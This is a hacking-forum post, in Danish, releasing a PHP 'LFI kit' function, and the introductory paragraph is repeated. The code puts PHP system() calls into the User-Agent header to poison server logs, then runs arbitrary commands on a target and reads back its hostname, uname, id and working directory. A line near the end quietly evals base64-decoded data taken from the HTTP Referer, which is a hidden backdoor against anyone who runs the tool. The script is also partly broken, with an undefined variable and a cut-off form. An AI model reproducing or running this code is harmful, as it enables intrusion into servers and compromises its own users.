31-07-2013, 19:28
Release by; Harzard coders.
Okay, så mig og mine gode venner har sat os til at arbejde på et LFI kit igår aftes. Jeg tænkte det her måske er interessant for jer som synes penetrating er skide skægt ;)
Det her er simpelthen en af hovedfunktionerne til at angribe dit target. Undskylder hvis der er mindre fejl i scriptet, jeg har ikke rettet det før release da jeg ikke kan vente, det ligesom med en gave, man kan bare ikke vente. Jeg har ikke tid til at forklare hvad det betyder eller gør, da jeg sidder på en cafe og min kæreste er på vej hen til mig for at spise med mig.
Okay, så mig og mine gode venner har sat os til at arbejde på et LFI kit igår aftes. Jeg tænkte det her måske er interessant for jer som synes penetrating er skide skægt ;)
Det her er simpelthen en af hovedfunktionerne til at angribe dit target. Undskylder hvis der er mindre fejl i scriptet, jeg har ikke rettet det før release da jeg ikke kan vente, det ligesom med en gave, man kan bare ikke vente. Jeg har ikke tid til at forklare hvad det betyder eller gør, da jeg sidder på en cafe og min kæreste er på vej hen til mig for at spise med mig.
PHP kode:
<?php
//Authors; xTropia, L!.am, H0ns3n
//Release by; Hazard coders
//Description: LFI kit function.
if($_POST['exploit']): //Release by; Hazard coders
$sasaran= str_replace("http://","",$_POST['host']);
$sp = explode("/",$sasaran);
$victim = $sp[0];
$port = 80;
$inject = str_replace($victim,"",$sasaran);
$command = "XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAME";
$command .= "XSIP<?php echo \$_SERVER['SERVER_ADDR']; ?>XSIP";
$command .= "XUNAME<?php echo system('uname -a;echo ;'); ?>XUNAME";
$command .= "XUSERID<?php echo system('id;echo ;'); ?>XUSERID";
$command .= "XPWD<?php echo system('pwd;echo ;'); ?>XPWD";
$command .= "XPHP<?php echo phpversion(); ?>XPHP";
if($_POST['cwd']){
$command .= "XCWD<?php chdir('".$_POST['cwd']."'); ?>XCWD";
}
$command .= "EXPLORE<pre><?php echo system('".$_POST['cmd']."; echo ; exit;'); ?></pre>EXPLORE";
if(eregi(":",$victim)){
$vp = explode(":",$victim);
$victim = $vp[0];
$port = $vp[1];
}
$sock = fsockopen($victim,$port,$errno,$errstr,30);
if ($sock) {
$get = "GET ".$exploit." HTTP/1.1\r\n".
"Host: ".$victim."\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/5.0 ".$command."\r\n".
"Connection: Close\r\n\r\n";
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600000))."\n";
}
fclose($sock);
}
$hostp = explode("XHOSTNAME",$output); $hostname = $hostp[1];
$ipp = explode("XSIP",$output); $ip = $ipp[1];
$unamep = explode("XUNAME",$output); $uname = $unamep[1];
$userp = explode("XUSERID",$output); $userid = $userp[1];
$currp = explode("XPWD",$output); $current = $currp[1];
$writes = @is_writable($current);
$phpvp = explode("XPHP",$output); $phpversion = $phpvp[1];
$hasil = explode("EXPLORE",$output); $return = $hasil[1];
endif;
$ipx =$_SERVER["REMOTE_ADDR"];
$portx ="22";
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
?>
<form action='<?php echo $_SERVER['PHP_SELF'] ?>' method='post'>
<?php if($_POST['exploit']){
?>